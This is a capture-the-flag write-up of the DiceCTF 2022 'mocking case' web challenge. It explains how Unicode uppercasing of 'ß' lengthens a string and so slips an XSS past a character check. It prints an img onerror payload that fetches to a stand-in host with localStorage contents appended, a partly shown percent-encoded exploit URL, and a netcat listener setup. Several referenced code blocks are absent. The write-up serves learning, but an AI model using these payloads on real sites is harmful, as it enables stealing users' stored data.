DiceCTF 2022 (Web, 140 pts)

Last weekend Galhacktic Trendsetters sort of spontaneously decided to do DiceCTF 2022, months or years after most of us had done another CTF. It was a lot of fun and we placed 6th!

I made a blazing fast MoCkInG CaSe converter!

We’re presented with a website that converts text to AlTeRnAtInG CaSe. The core converter is written in WASM, and also checks that its input doesn’t have any of the characters <>&". The JavaScript wrapper takes an input from the URL, converts it to uppercase, feeds it to the converter, and if the check passes, injects the output into an innerHTML. The goal is to compose a URL that, when visited by an admin bot, leaks the flag from localStorage.

The converter is compiled from this C code:

The most important part of the site’s JavaScript is as follows:

An overview of the logic:

  1. First, the JavaScript passes the input’s length into the converter and checks that that length is at most 1000.
  2. Then, it converts the input toUpperCase and writes it character by character into the converter, checking that none of those characters are greater than 128.
  3. Next, it calls the converter, which converts the case of the first length chars of its buffer, as well as checking for XSS.
  4. Finally, the JavaScript reads the output back until it sees a null byte, and injects that into innerHTML.

Although an innerHTML injection is very powerful, we can’t directly inject any HTML tags because the converter checks for <. We need to get around this check somehow. The handling of the input and output’s length, and in particular the way the output is read until a null byte, is quite suspicious: the string that we compute the length of and the string that we eventually write aren’t the same.

And indeed, the core exploit in this challenge is that converting a string to uppercase does not preserve its length. The simplest example of this I used is U+00DF “ß”, the German eszett, which is one character but which gets uppercased into two, “SS” — furthermore, both of them are ASCII characters. There are a few other examples; I think SpecialCasing.txt from the Unicode Character Database is the authoritative source. (Notably, U+FB03 “ffi” and U+FB04 “ffl” each get uppercased into three letters, which gives us more room to write our exploit if we want it, as I explain below.)

What a character like this enables us to do is: if we pad our input with many ß’s at the beginning, then the length received by the converter will be much shorter than the “true length” of the uppercased string that the converter eventually receives. The converter will then only check for the XSS characters in the first length characters (while case-converting them). However, because the JS wrapper reads until it sees a null byte, it will read the entire string back out. So we can sneak an XSS in the part after the first length characters.

There were a few more complications, all of them relatively minor, but they still took me an hour or two to sort out. One of them was the rather newbie realization that I had never actually set up a public-facing web server to exfiltrate a flag from a CTF before. (The only other CTF challenge I’ve done involving exfiltration from a browser, Cat Chat, provided its own exfiltration mechanism.) But I do have a cheap Linode server now, so I copy-pasted one of my nginx config lines to reverse proxy a path to a specific port and ran nc -l on that port as needed.

The next complication is that a <script> tag injected via innerHTML does not execute. This is so well-documented that it appears in MDN’s docs for innerHTML. Happily, that page also includes an alternative exploit that does work: <img src='x' onerror='code'>.

However, there is a final overlapping complication: our XSS gets passed through .toUpperCase(), so it can’t contain any lowercase letters! If the <script> exploit had worked, we could have sourced an external JavaScript file whose URL doesn’t contain lowercase letters. However, the <img onerror> exploit requires us to write JavaScript inline, which is a bit more painful. I did find a writeup of an Intigriti Challenge by Amal Murali that mentioned an <iframe srcdoc> exploit along these lines:

Unfortunately, although this exploit worked “locally” for me, it didn’t when I pasted it into the bot.

I got stuck here for a bit. I tried for a while to write an exploit without any lowercase letters; I knew it was possible a la JSFuck, but I wasn’t sure if I could also satisfy the length constraint of about 500 characters (which could have become 666 if I had known about ffi or ffl). But eventually I talked to my teammates and cesium pointed out that I could replace every lowercase letter with an ampersand escape (“character references”) in my exploit, which would get unescaped when they were injected into innerHTML and interpreted as an attribute.

As a final tiny obstacle, it took some effort to percent encode everything properly. While for many Unicode characters you can get percent encoding for free by pasting them into a browser’s URL bar and then copying them out again, both the & and the # in the ampersand escape have other meanings in URLs and need to be manually encoded, as does + because URLSearchParams parses it as a space.

In any case, we no longer have any restrictions and can just write straightforward JavaScript and then escape it. If we take <IMG SRC=X ONERROR='fetch("HTTPS://EXAMPLE.COM/"+localStorage.getItem("flag"))'>, prepend lots of ß’s, and encode properly, we end up with a final working exploit (replace EXAMPLE.COM with your exfiltration website):;%26%23105;%26%23110;%26%23100;%26%23111;%26%23119;.%26%23102;%26%23101;%26%23116;%26%2399;%26%23104;(%27HTTPS://EXAMPLE.COM/%27%2B%26%23108;%26%23111;%26%2399;%26%2397;%26%23108;S%26%23116;%26%23111;%26%23114;%26%2397;%26%23103;%26%23101;.%26%23103;%26%23101;%26%23116;I%26%23116;%26%23101;%26%23109;(%27%26%23102;%26%23108;%26%2397;%26%23103;%27));%22%3E

nc -l 1337 outputting a GET request with the flag. Screenshot.
Leaking the flag from my cheap Linode server

For my own reference next time, seems to be a popular tool for free exfiltration endpoints. And maybe ngrok offers a bit more flexibility for a bit more setup, but still doesn’t require setting up a server.

Appendix: The no-lowercase-letters strategy

After solving this challenge and becoming stuck on everything else, I went back and finished the JSFuck approach of writing an exploit without any lowercase letters. The character limit was not as harsh as I feared, since I had a full uppercase alphabet of variables, and adapting bits and pieces of the JSFuck source code was fairly intuitive.

Here’s a lightly commented version of the JavaScript without any lowercase letters I ended up with that will exfiltrate the flag from localStorage:

The exploit can be produced in the same way: putting it in <img src=x onerror='...'> and padding with ß’s. After deleting all the comments and whitespace, the code above is about 330 characters, and there are many ways to shave a few more off (renaming CTR, replacing most ""s with a variable… there was actually no need to go through [][F+L+A+T] to get a function when (_=>_) would have sufficed), so there’s plenty of room to spare.

After the CTF, I was somewhat relieved to see that Smitop’s writeup also took this approach, which means I wasn’t the only one who didn’t think of using ampersand escapes.

(note: the commenting setup here is experimental and I may not check my comments often; if you want to tell me something instead of the world, email me!)